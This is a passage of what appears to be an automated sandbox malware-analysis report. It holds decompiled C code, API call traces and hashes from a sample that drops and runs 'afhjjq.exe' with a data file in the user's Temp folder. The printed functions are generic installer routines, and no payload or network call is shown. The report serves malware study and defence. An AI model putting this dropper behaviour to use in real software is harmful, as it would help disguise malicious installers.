                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                            • String ID: F
                            • API String ID: 941294808-1304234792
                            • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                            • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                            • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                            • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                            				struct _ITEMIDLIST* _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				signed int _t44;
                            				WCHAR* _t45;
                            				signed char _t47;
                            				signed int _t48;
                            				short _t59;
                            				short _t61;
                            				short _t63;
                            				void* _t71;
                            				signed int _t77;
                            				signed int _t78;
                            				short _t81;
                            				short _t82;
                            				signed char _t84;
                            				signed int _t85;
                            				void* _t98;
                            				void* _t104;
                            				intOrPtr* _t105;
                            				void* _t107;
                            				WCHAR* _t108;
                            				void* _t110;
                            
                            				_t107 = __esi;
                            				_t104 = __edi;
                            				_t71 = __ebx;
                            				_t44 = _a8;
                            				if(_t44 < 0) {
                            					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                            				}
                            				_push(_t71);
                            				_push(_t107);
                            				_push(_t104);
                            				_t105 =  *0x42a298 + _t44 * 2;
                            				_t45 = 0x428200;
                            				_t108 = 0x428200;
                            				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                            					_t108 = _a4;
                            					_a4 = _a4 & 0x00000000;
                            				}
                            				_t81 =  *_t105;
                            				_a8 = _t81;
                            				if(_t81 == 0) {
                            					L43:
                            					 *_t108 =  *_t108 & 0x00000000;
                            					if(_a4 == 0) {
                            						return _t45;
                            					}
                            					return E00406668(_a4, _t45);
                            				} else {
                            					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                            						_t98 = 2;
                            						_t105 = _t105 + _t98;
                            						if(_t81 >= 4) {
                            							if(__eflags != 0) {
                            								 *_t108 = _t81;
                            								_t108 = _t108 + _t98;
                            								__eflags = _t108;
                            							} else {
                            								 *_t108 =  *_t105;
                            								_t108 = _t108 + _t98;
                            								_t105 = _t105 + _t98;
                            							}
                            							L42:
                            							_t82 =  *_t105;
                            							_a8 = _t82;
                            							if(_t82 != 0) {
                            								_t81 = _a8;
                            								continue;
                            							}
                            							goto L43;
                            						}
                            						_t84 =  *((intOrPtr*)(_t105 + 1));
                            						_t47 =  *_t105;
                            						_t48 = _t47 & 0x000000ff;
                            						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                            						_t85 = _t84 & 0x000000ff;
                            						_v28 = _t48 | 0x00008000;
                            						_t77 = 2;
                            						_v16 = _t85;
                            						_t105 = _t105 + _t77;
                            						_v24 = _t48;
                            						_v20 = _t85 | 0x00008000;
                            						if(_a8 != _t77) {
                            							__eflags = _a8 - 3;
                            							if(_a8 != 3) {
                            								__eflags = _a8 - 1;
                            								if(__eflags == 0) {
                            									__eflags = (_t48 | 0xffffffff) - _v12;
                            									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                            								}
                            								L38:
                            								_t108 =  &(_t108[lstrlenW(_t108)]);
                            								_t45 = 0x428200;
                            								goto L42;
                            							}
                            							_t78 = _v12;
                            							__eflags = _t78 - 0x1d;
                            							if(_t78 != 0x1d) {
                            								__eflags = (_t78 << 0xb) + 0x42b000;
                            								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                            							} else {
                            								E004065AF(_t108,  *0x42a268);
                            							}
                            							__eflags = _t78 + 0xffffffeb - 7;
                            							if(__eflags < 0) {
                            								L29:
                            								E004068EF(_t108);
                            							}
                            							goto L38;
                            						}
                            						if( *0x42a2e4 != 0) {
                            							_t77 = 4;
                            						}
                            						_t121 = _t48;
                            						if(_t48 >= 0) {
                            							__eflags = _t48 - 0x25;
                            							if(_t48 != 0x25) {
                            								__eflags = _t48 - 0x24;
                            								if(_t48 == 0x24) {
                            									GetWindowsDirectoryW(_t108, 0x400);
                            									_t77 = 0;
                            								}
                            								while(1) {
                            									__eflags = _t77;
                            									if(_t77 == 0) {
                            										goto L26;
                            									}
                            									_t59 =  *0x42a264;
                            									_t77 = _t77 - 1;
                            									__eflags = _t59;
                            									if(_t59 == 0) {
                            										L22:
                            										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                            										__eflags = _t61;
                            										if(_t61 != 0) {
                            											L24:
                            											 *_t108 =  *_t108 & 0x00000000;
                            											__eflags =  *_t108;
                            											continue;
                            										}
                            										__imp__SHGetPathFromIDListW(_v8, _t108);
                            										_a8 = _t61;
                            										__imp__CoTaskMemFree(_v8);
                            										__eflags = _a8;
                            										if(_a8 != 0) {
                            											goto L26;
                            										}
                            										goto L24;
                            									}
                            									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                            									__eflags = _t63;
                            									if(_t63 == 0) {
                            										goto L26;
                            									}
                            									goto L22;
                            								}
                            								goto L26;
                            							}
                            							GetSystemDirectoryW(_t108, 0x400);
                            							goto L26;
                            						} else {
                            							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                            							if( *_t108 != 0) {
                            								L27:
                            								if(_v16 == 0x1a) {
                            									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                            								}
                            								goto L29;
                            							}
                            							E004066A5(_t77, _t105, _t108, _t108, _v16);
                            							L26:
                            							if( *_t108 == 0) {
                            								goto L29;
                            							}
                            							goto L27;
                            						}
                            					}
                            					goto L43;
                            				}
                            			}






























                            APIs
                            • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000400), ref: 004067C0
                            • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                            • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                            • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Directory$SystemWindowslstrcatlstrlen
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                            • API String ID: 4260037668-1106327437
                            • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                            • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                            • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                            • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E004056CA(signed int _a4, WCHAR* _a8) {
                            				struct HWND__* _v8;
                            				signed int _v12;
                            				WCHAR* _v32;
                            				long _v44;
                            				int _v48;
                            				void* _v52;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				WCHAR* _t27;
                            				signed int _t28;
                            				long _t29;
                            				signed int _t37;
                            				signed int _t38;
                            
                            				_t27 =  *0x429244;
                            				_v8 = _t27;
                            				if(_t27 != 0) {
                            					_t37 =  *0x42a314;
                            					_v12 = _t37;
                            					_t38 = _t37 & 0x00000001;
                            					if(_t38 == 0) {
                            						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                            					}
                            					_t27 = lstrlenW(0x422728);
                            					_a4 = _t27;
                            					if(_a8 == 0) {
                            						L6:
                            						if((_v12 & 0x00000004) == 0) {
                            							_t27 = SetWindowTextW( *0x429228, 0x422728);
                            						}
                            						if((_v12 & 0x00000002) == 0) {
                            							_v32 = 0x422728;
                            							_v52 = 1;
                            							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                            							_v44 = 0;
                            							_v48 = _t29 - _t38;
                            							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                            							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                            						}
                            						if(_t38 != 0) {
                            							_t28 = _a4;
                            							0x422728[_t28] = 0;
                            							return _t28;
                            						}
                            					} else {
                            						_t27 = lstrlenW(_a8) + _a4;
                            						if(_t27 < 0x1000) {
                            							_t27 = lstrcatW(0x422728, _a8);
                            							goto L6;
                            						}
                            					}
                            				}
                            				return _t27;
                            			}


















                            APIs
                            • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                            • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                            • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                            • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                              • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                              • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                            • String ID: ('B
                            • API String ID: 1495540970-2332581011
                            • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                            • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                            • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                            • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                            				struct tagLOGBRUSH _v16;
                            				long _t39;
                            				long _t41;
                            				void* _t44;
                            				signed char _t50;
                            				long* _t54;
                            
                            				if(_a4 + 0xfffffecd > 5) {
                            					L18:
                            					return 0;
                            				}
                            				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                            				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                            					goto L18;
                            				} else {
                            					_t50 = _t54[5];
                            					if((_t50 & 0xffffffe0) != 0) {
                            						goto L18;
                            					}
                            					_t39 =  *_t54;
                            					if((_t50 & 0x00000002) != 0) {
                            						_t39 = GetSysColor(_t39);
                            					}
                            					if((_t54[5] & 0x00000001) != 0) {
                            						SetTextColor(_a8, _t39);
                            					}
                            					SetBkMode(_a8, _t54[4]);
                            					_t41 = _t54[1];
                            					_v16.lbColor = _t41;
                            					if((_t54[5] & 0x00000008) != 0) {
                            						_t41 = GetSysColor(_t41);
                            						_v16.lbColor = _t41;
                            					}
                            					if((_t54[5] & 0x00000004) != 0) {
                            						SetBkColor(_a8, _t41);
                            					}
                            					if((_t54[5] & 0x00000010) != 0) {
                            						_v16.lbStyle = _t54[2];
                            						_t44 = _t54[3];
                            						if(_t44 != 0) {
                            							DeleteObject(_t44);
                            						}
                            						_t54[3] = CreateBrushIndirect( &_v16);
                            					}
                            					return _t54[3];
                            				}
                            			}










                            APIs
                            • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                            • GetSysColor.USER32(00000000), ref: 00404686
                            • SetTextColor.GDI32(?,00000000), ref: 00404692
                            • SetBkMode.GDI32(?,?), ref: 0040469E
                            • GetSysColor.USER32(?), ref: 004046B1
                            • SetBkColor.GDI32(?,?), ref: 004046C1
                            • DeleteObject.GDI32(?), ref: 004046DB
                            • CreateBrushIndirect.GDI32(?), ref: 004046E5
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                            • String ID:
                            • API String ID: 2320649405-0
                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                            				intOrPtr _t65;
                            				intOrPtr _t66;
                            				intOrPtr _t72;
                            				void* _t76;
                            				void* _t79;
                            
                            				_t72 = __edx;
                            				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                            				_t65 = 2;
                            				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                            				_t66 = E00402D84(_t65);
                            				_t79 = _t66 - 1;
                            				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                            				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                            				if(_t79 < 0) {
                            					L36:
                            					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                            				} else {
                            					__ecx = 0x3ff;
                            					if(__eax > 0x3ff) {
                            						 *(__ebp - 0x44) = 0x3ff;
                            					}
                            					if( *__edi == __bx) {
                            						L34:
                            						__ecx =  *(__ebp - 0xc);
                            						__eax =  *(__ebp - 8);
                            						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                            						if(_t79 == 0) {
                            							 *(_t76 - 4) = 1;
                            						}
                            						goto L36;
                            					} else {
                            						 *(__ebp - 0x38) = __ebx;
                            						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                            						if( *(__ebp - 0x44) > __ebx) {
                            							do {
                            								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                            									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                            										__eax = __ebp - 0x50;
                            										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                            											goto L34;
                            										} else {
                            											goto L21;
                            										}
                            									} else {
                            										goto L34;
                            									}
                            								} else {
                            									__eax = __ebp - 0x40;
                            									_push(__ebx);
                            									_push(__ebp - 0x40);
                            									__eax = 2;
                            									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                            									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                            									if(__eax == 0) {
                            										goto L34;
                            									} else {
                            										__ecx =  *(__ebp - 0x40);
                            										if(__ecx == __ebx) {
                            											goto L34;
                            										} else {
                            											__ax =  *(__ebp + 0xa) & 0x000000ff;
                            											 *(__ebp - 0x4c) = __ecx;
                            											 *(__ebp - 0x50) = __eax;
                            											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                            												L28:
                            												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                            											} else {
                            												__ebp - 0x50 = __ebp + 0xa;
                            												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                            													L21:
                            													__eax =  *(__ebp - 0x50);
                            												} else {
                            													__edi =  *(__ebp - 0x4c);
                            													__edi =  ~( *(__ebp - 0x4c));
                            													while(1) {
                            														_t22 = __ebp - 0x40;
                            														 *_t22 =  *(__ebp - 0x40) - 1;
                            														__eax = 0xfffd;
                            														 *(__ebp - 0x50) = 0xfffd;
                            														if( *_t22 == 0) {
                            															goto L22;
                            														}
                            														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                            														__edi = __edi + 1;
                            														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                            														__eax = __ebp + 0xa;
                            														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                            															continue;
                            														} else {
                            															goto L21;
                            														}
                            														goto L22;
                            													}
                            												}
                            												L22:
                            												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                            													goto L28;
                            												} else {
                            													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                            														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                            															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                            															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                            														} else {
                            															__ecx =  *(__ebp - 0xc);
                            															__edx =  *(__ebp - 8);
                            															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                            															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                            														}
                            														goto L34;
                            													} else {
                            														__ecx =  *(__ebp - 0xc);
                            														__edx =  *(__ebp - 8);
                            														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                            														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                            														 *(__ebp - 0x38) = __eax;
                            														if(__ax == __bx) {
                            															goto L34;
                            														} else {
                            															goto L26;
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            								}
                            								goto L37;
                            								L26:
                            								__eax =  *(__ebp - 8);
                            							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                            						}
                            						goto L34;
                            					}
                            				}
                            				L37:
                            				return 0;
                            			}









                            APIs
                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                              • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: File$Pointer$ByteCharMultiWide$Read
                            • String ID: 9
                            • API String ID: 163830602-2366072709
                            • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                            • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                            • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                            • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E004068EF(WCHAR* _a4) {
                            				short _t5;
                            				short _t7;
                            				WCHAR* _t19;
                            				WCHAR* _t20;
                            				WCHAR* _t21;
                            
                            				_t20 = _a4;
                            				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                            					_t20 =  &(_t20[4]);
                            				}
                            				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                            					_t20 =  &(_t20[2]);
                            				}
                            				_t5 =  *_t20;
                            				_t21 = _t20;
                            				_t19 = _t20;
                            				if(_t5 != 0) {
                            					do {
                            						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                            							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                            							_t19 = CharNextW(_t19);
                            						}
                            						_t20 = CharNextW(_t20);
                            						_t5 =  *_t20;
                            					} while (_t5 != 0);
                            				}
                            				 *_t19 =  *_t19 & 0x00000000;
                            				while(1) {
                            					_push(_t19);
                            					_push(_t21);
                            					_t19 = CharPrevW();
                            					_t7 =  *_t19;
                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                            						break;
                            					}
                            					 *_t19 =  *_t19 & 0x00000000;
                            					if(_t21 < _t19) {
                            						continue;
                            					}
                            					break;
                            				}
                            				return _t7;
                            			}









                            APIs
                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                            • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                            • CharNextW.USER32(?,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                            • CharPrevW.USER32(?,?,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Char$Next$Prev
                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                            • API String ID: 589700163-1201062745
                            • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                            • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                            • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                            • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0040302E(intOrPtr _a4) {
                            				short _v132;
                            				long _t6;
                            				struct HWND__* _t7;
                            				struct HWND__* _t15;
                            
                            				if(_a4 != 0) {
                            					_t15 =  *0x420efc;
                            					if(_t15 != 0) {
                            						_t15 = DestroyWindow(_t15);
                            					}
                            					 *0x420efc = 0;
                            					return _t15;
                            				}
                            				if( *0x420efc != 0) {
                            					return E00406A71(0);
                            				}
                            				_t6 = GetTickCount();
                            				if(_t6 >  *0x42a26c) {
                            					if( *0x42a268 == 0) {
                            						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                            						 *0x420efc = _t7;
                            						return ShowWindow(_t7, 5);
                            					}
                            					if(( *0x42a314 & 0x00000001) != 0) {
                            						wsprintfW( &_v132, L"... %d%%", E00403012());
                            						return E004056CA(0,  &_v132);
                            					}
                            				}
                            				return _t6;
                            			}








                            APIs
                            • DestroyWindow.USER32(?,00000000), ref: 00403049
                            • GetTickCount.KERNEL32 ref: 00403067
                            • wsprintfW.USER32 ref: 00403095
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                            • CreateDialogParamW.USER32 ref: 004030B9
                            • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                              • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                            • String ID: ... %d%%
                            • API String ID: 722711167-2449383134
                            • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
